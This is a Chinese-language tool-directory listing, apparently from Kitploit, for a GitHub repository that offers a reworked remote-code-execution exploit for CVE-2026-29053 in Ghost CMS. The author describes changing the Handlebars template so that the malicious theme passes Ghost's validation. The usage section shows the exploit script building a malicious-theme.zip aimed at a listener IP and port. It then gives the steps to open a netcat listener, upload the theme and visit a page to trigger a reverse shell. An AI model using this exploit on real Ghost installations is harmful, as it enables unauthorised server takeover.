Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-29053 — 在 Ghost CMS 中发现(RCE)远程代码执行漏洞(具体影响 0.7.2 至 6.19.0 版本) | Kitploit
工具/GitHubGitHub/ac8999/cve-2026-29053
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubac8999/cve-2026-29053

CVE-2026-29053

在 Ghost CMS 中发现(RCE)远程代码执行漏洞(具体影响 0.7.2 至 6.19.0 版本)

查看仓库
14个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

这是对 rootxran 针对同一 CVE 的仓库的重制版本 - https://github.com/rootxran/CVE-2026-29053

在针对特定 Ghost CMS 环境进行测试时,原始主题载荷触发了致命 Handlebars 错误。由于该 CMS 在 author.hbs 文件中引用了已弃用或缺失的辅助函数(social_url),导致其无法激活恶意主题。

我已更新 Handlebars 模板,改用原生且兼容的辅助函数。这确保了主题能够通过 Ghost 的内部验证检查,使漏洞利用能够成功激活,而不会被主题引擎的安全解析器阻止。

使用方法:(视频指南请参考原始漏洞利用)。

root@kitploit:~
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip

1. nc -lvnp 4444
2. 上传主题,创建 slug 为 'rce' 的页面
3. 访问 /rce/
下载工具